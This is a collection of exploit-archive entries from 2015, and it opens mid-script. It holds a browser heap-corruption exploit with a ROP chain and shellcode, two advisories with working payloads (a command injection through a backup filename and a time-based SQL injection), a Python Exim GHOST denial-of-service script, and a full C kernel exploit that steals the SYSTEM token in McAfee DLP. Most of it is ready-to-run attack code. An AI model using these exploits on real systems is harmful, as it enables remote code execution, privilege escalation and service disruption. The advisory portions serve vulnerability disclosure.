"jscript9!Js::TypedArray<unsigned int>" (0x55 * 0x30 = 0xff0) as a typed array header has the size of 0x30. 0x10 bytes are left empty */ for(var i= 0; i<0x55; i++){ /* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */ arr[k][i] = new Uint32Array(intArrBuf, 0, 1); } /* tag the array's last element */ arr[k][arrSize - 1] = 0x12121212 k += 1; } /* perform controlled memwrite to 0x1111f010: typed array header is at 0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with 0x00000001 0x00000004 0x00000040 0x1111f030 0x00 The first 3 dwords are sideeffects due to the code we abuse for the controlled memcpy */ addr = 0x1111f010 // WHERE TO WRITE /* prepare buffer with address we want to write to */ ptrBuf = "" /* fill buffer: length = relative pointer address - buffer start + pointer offset */ while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"} ptrBuf += dword2str(addr) /* trigger: overflow buffer and overwrite the pointer value after buffer */ obj.SetText(ptrBuf,0,0) //alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068") /* use overwritten pointer after buffer with method "SetFontName" to conduct memory write. We overwrite a typed array's header length to 0x40 and let its buffer point to the next typed array header at 0x1111f030 (see above) */ obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE /* find the corrupted Uint32Array (typed array) */ k = 0 arrCorrupt = 0 while(k < 0x1000-1){ for(var i = 0; i < 0x55-1; i++){ if(arr[k][i][0] != 0){ // address of jscript9!Js::TypedArray<unsigned int>::`vftable' //alert("0x" + arr[k][i][0].toString(16)) arrCorrupt = 1 break } } if (arrCorrupt == 1) break k++ } if (!arrCorrupt){ alert("cannot find corrupted Uint32Array") return -1 } /* modify subsequent Uint32Array to be able to RW all process memory */ arr[k][i][6] = 0x7fffffff // next Uint32Array length arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem /* our memory READWRITE interface :) */ mem = arr[k][i+1] //alert(mem.length.toString(16)) if (mem.length != 0x7fffffff){ alert("Cannot change Uint32Array length") return -2 } /* now we could even repair the change we did with memcpy ... */ /* leak several pointers and calculate VideoPlayer.ocx base */ arr[k+1][0] = obj // set HTMLObjectElement as first element //alert(mem[0x11120020/4].toString(16)) arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj) objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18 heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64 /* deref heap pointer containing VideoPlayer.ocx pointer */ videoplayerPtr = mem[heapPtrVideoplayer/4] base = videoplayerPtr - 0x6b3b0 // calculate base /* check if we have the image of VideoPlayer.ocx check for MZ9000 header and "Vide" string at offset 0x6a000 */ if (mem[base/4] != 0x905a4d || mem[(base+0x6a000)/4] != 0x65646956){ alert("Cannot find VideoPlayer.ocx base or its version is wrong") return -3 } //alert(base.toString(16)) /* get VirtualAlloc from imports of VideoPlayer.ocx */ virtualAlloc = mem[(base + 0x69174)/4] /* memcpy is available inside VideoPlayer.ocx */ memcpy = base + 0x15070 //alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16)) /* create shellcode (./msfvenom -p windows/exec cmd=calc) */ sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+ "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+ "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+ "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+ "\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+ "\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+ "\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+ "\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+ "\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+ "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+ "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+ "\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+ "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+ "\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+ "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+ "\x00" scBuf = new Uint8Array(sc.length) for (n=0; n<sc.length; n++){ scBuf[n] = sc.charCodeAt(n) } /* leak shellcode address */ arr[k+1][0] = scBuf /* therefore, leak array element at 0x11120020 (typed array header of Uint8Array containing shellcode) ... */ elemPtr = mem[(addr + 0x1010)/4] /* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */ scAddr = mem[(elemPtr/4) + 7] //alert(scAddr.toString(16)) /* create and leak rop buffer */ rop = new Uint32Array(0x1000) arr[k+1][0] = rop /* leak array element at 0x11120020 (typed array header) */ elemPtr = mem[(addr + 0x1010)/4] /* deref array element + 0x1c (leak rop's buffer address) */ pAddr = mem[(elemPtr/4) + 7] // payload address /* ROP chain (rets in comments are omitted) */ /* we perform: (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX) memcpy(EAX, shellcode, shellcodeLen) (void(*)())EAX() */ offs = 0x30/4 // offset to chain after CALL [EAX+0x30] rop[0] = base + 0x1ff6 // ADD ESP, 0x30; rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called rop[offs + 0x1] = virtualAlloc // allocate RWX mem (address avail. in EAX) rop[offs + 0x2] = base + 0x10e9 // POP ECX; => pop the value at offs + 0x7 rop[offs + 0x3] = 0 // lpAddress rop[offs + 0x4] = 0x1000 // dwSize (0x1000) rop[offs + 0x5] = 0x1000 // flAllocationType (MEM_COMMIT) rop[offs + 0x6] = 0x40 // flProtect (PAGE_EXECUTE_READWRITE) rop[offs + 0x7] = pAddr + (offs+0xe)*4 // points to memcpy's dst param (*2) rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem rop[offs + 0x9] = base + 0x10e9 // POP ECX; rop[offs + 0xa] = pAddr + (offs+0xd)*4 // points to (*1) in chain rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem rop[offs + 0xc] = memcpy rop[offs + 0xd] = 0xffffffff // (*1): ret addr to RWX mem filled at runtime rop[offs + 0xe] = 0xffffffff // (*2): dst for memcpy filled at runtime rop[offs + 0xf] = scAddr // shellcode src addr to copy to RWX mem (param2) rop[offs + 0x10] = sc.length // length of shellcode (param3) /* manipulate object data to gain EIP control with "Play" method */ videopObj = mem[objPtr/4 + 26] mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call /* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */ obj.Play() } /* dword to little endian string */ function dword2str(dword){ str = "" for (n=0; n<4; n++){ str += String.fromCharCode((dword >> 8*n) & 0xff) } return str } //setTimeout(run(), 3000); </script> </body> </html>

Vantage Point Security Advisory 2014-007 ======================================== Title: Symantec Encryption Management Server - Remote Command Injection ID: VP-2014-007 Vendor: Symantec Affected Product: Symantec Encryption Gateway Affected Versions: < 3.2.0 MP6 Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ Author: Paul Craig <paul[at]vantagepoint[dot]sg Summary: --------- Symantec Gateway Email Encryption provides centrally managed email encryption to secure email communications with customers and partners regardless of whether or not recipients have their own email encryption software. With Gateway Email Encryption, organizations can minimize the risk of a data breach while complying with regulatory mandates for information security and privacy. Details: --------- Remote Command Injection vulnerabilities occur when user supplied input is used directly as a command line argument to a fork(), execv() or a CreateProcessA() function. It was found that the binary /usr/bin/pgpsysconf calls the binary /usr/bin/pgpbackup with unfiltered user supplied input when restoring a Database Backup from the Symantec Encryption Management Web Interface . The user supplied 'filename' value is used directly as a command argument, and can be concatenated to include additional commands with the use of the pipe character. This can allow a lower privileged Administrator to compromise the Encryption Management Server. This is demonstrated below in a snippet from pgpsysconf; .text:08058FEA mov dword ptr [ebx], offset aUsrBinPgpbacku ; "/usr/bin/pgpbackup" .text:08058FF0 cmp [ebp+var_1D], 0 .text:08058FF4 jnz short loc_8059049 .text:08058FF6 mov ecx, 4 .text:08058FFB mov edx, 8 .text:08059000 mov eax, 0Ch .text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50 .text:0805900C mov [ebx+edx], esi .text:0805900F mov dword ptr [ebx+eax], 0 .text:08059016 call _fork ; Bingo.. An example to exploit this vulnerability and run the ping command can be seen below. POST /omc/uploadBackup.event .... .... Content-Disposition: form-data; name="file"; filename="test123|`ping`|-whatever.tar.gz.pgp" This vulnerability can be further exploited to gain local root access by calling the setuid binary pgpsysconf to install a local package file. Fix Information: --------- Upgrade to Symantec Encryption Management Server 3.3.2 MP7. See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00 for more information Timeline: --------- 2014/11/26: Issue Reported. 2015/01/30: Patch Released. About Vantage Point Security: --------- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg

Title - NPDS CMS Revolution-13 - SQL Injection Vulnerability Credits & Author: Narendra Bhati ( R00t Sh3ll ) www.websecgeeks.com References (Source): ==================== http://www.npds.org/viewtopic.php?topic=26233&forum=12 http://websecgeeks.com/npds-cms-sql-injection/ Release Date: ============= 24-01-2015 CVE ID : ==================================== CVE-2015-1400 Product & Service Introduction: =============================== http://www.npds.org/ Abstract Advisory Information: ============================== Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection vulnerability in the NPDS CMS . Vulnerability Disclosure Timeline: ================================== 25-01-2015 : Public Disclosure Timeline Status: ================= Reported To Vendor 14-12-2014 Verified By Vendor 15-12-2014 Acknowledge By Vendor 14-01-2015 Public Disclosure By Vendor 24-01-2015 Technical Disclosure 25-01-2015 Vendor Security Advisory http://www.npds.org/viewtopic.php?topic=26233&forum=12 Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/ CVE-2015-1400 Mitigation For This Vulnerability There Is No Update By Vendor , But That Will Be Out Soon ! Affected Product(s): ==================== NPDS-Revolution-13 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13. The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms. The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection that allows to compromise the web-application and connected dbms. Request Method(s): [+] POST Vulnerable Module(s): [+] NPDS-Revolution-13 Vulnerable File(s): [+] search.php Vulnerable Parameter(s): [+] query Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account. For reproduce the security vulnerability follow the provided information and steps below to continue. HTTP Request ##### ========== POST /npds/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/npds/index.php?op=edito Cookie: cookievalue Connection: keep-alive content-type:! application/x-www-form-urlencoded Content-Length: 63 query=")and benchmark(20000000,sha1(1))- ==================================== Reference(s): http://www.npds.org/viewtopic.php?topic=26233&forum=12 http://websecgeeks.com/npds-cms-sql-injection/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file. Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks. Security Risk: ============== The security risk of the remote sql injection web vulnerability as critical Credits & Author: ================== Narendra Bhati ( R00t Sh3ll ) www.websecgeeks.com

# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit] # Date: [1/29/2015] # Exploit Author: [1N3] # Vendor Homepage: [www.exim.org] # Version: [4.80 or less] # Tested on: [debian-7-7-64b] # CVE : [2015-0235] #!/usr/bin/python # Exim ESMTP DoS Exploit by 1N3 v20150128 # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow # http://crowdshield.com # # USAGE: python ghost-smtp-dos.py <ip> <port> # # Escape character is '^]'. # 220 debian-7-7-64b ESMTP Exim 4.80 ... # HELO # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 # Connection closed by foreign host. # # user () debian-7-7-64b:~$ dmesg # ... # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in # libc-2.13.so[7fabef2a2000+182000] import socket import time import sys, getopt def main(argv): argc = len(argv) if argc <= 1: print "usage: %s <host>" % (argv[0]) sys.exit(0) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" target = argv[1] # SET TARGET port = argv[2] # SET PORT print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com" print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((target,int(port))) data = s.recv(1024) print "CONNECTION: " +data s.send('HELO ' + buffer + '\r\n') data = s.recv(1024) print "received: " +data s.send('EHLO ' + buffer + '\r\n') data = s.recv(1024) print "received: " +data s.close() main(sys.argv)

/* Exploit Title - McAfee Data Loss Prevention Endpoint Arbitrary Write Privilege Escalation Date - 29th January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.mcafee.com Tested Version - 9.3.200.23 Driver Version - 9.3.200.23 - hdlpctrl.sys Tested on OS - 32bit Windows XP SP3 and Windows 2003 Server SP2 OSVDB - http://www.osvdb.org/show/osvdb/117345 CVE ID - CVE-2015-1305 Vendor fix url - https://kc.mcafee.com/corporate/index?page=content&id=SB10097 Fixed version - 9.3.400 Fixed driver ver - */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct // Windows Server 2003 #define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct #define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct #define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct #define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 }; BYTE token_steal_w2k3[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN 0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf("McAfee Data Loss Prevention Endpoint (hdlpctrl.sys) Arbitrary Write EoP Exploit\n"); printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 3) { printf("[i] Running Windows Server 2003\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "devbkctrl"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); if (GetWindowsVersion() == 1) { memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); } if (GetWindowsVersion() == 3) { memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3)); } hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x00224014, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); return 0; }